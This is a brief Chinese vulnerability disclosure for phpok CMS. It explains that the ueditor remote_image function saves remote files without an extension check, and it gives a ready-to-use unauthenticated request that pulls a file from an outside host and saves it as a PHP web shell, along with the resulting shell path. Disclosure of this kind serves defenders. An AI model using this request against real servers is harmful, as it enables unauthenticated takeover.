无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。

不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明：

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明：

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是

测试问题嘛 不做破坏

shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。

http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·PF_RING FT许可证初始化漏洞利用
• ·Drupal SA-CORE-2019-003远程命令执行分
• ·三星Galaxy App商店漏洞导致中间人攻击实
• ·Ubuntu 18.04 修复 Linux 内核的 11 个漏
• ·2018年Windows漏洞年度盘点
• ·微信多平台低版本漏洞之MMTLS绕过PC也能
• ·Apache Spark RPC协议中的反序列化漏洞分
• ·ThinkPHP5远程命令执行漏洞
• ·宝塔面板6.x版本前台存储xss+后台csrf组
• ·漏洞预警丨某通用交易所框架组合型严重漏
• ·niushop CMS最新版本测试全过程（前台Get
• ·thinkphp v5.x 远程代码执行漏洞poc(附脚
• ·CVE-2018-12613 PhpMyadmin后台文件包含
• ·ThinkPHP5 RCE漏洞重现及分析
• ·Flash 0Day: CVE-2018-15982 Exploit复现
• ·赛门铁克Altiris权限提升漏洞分析（CVE-2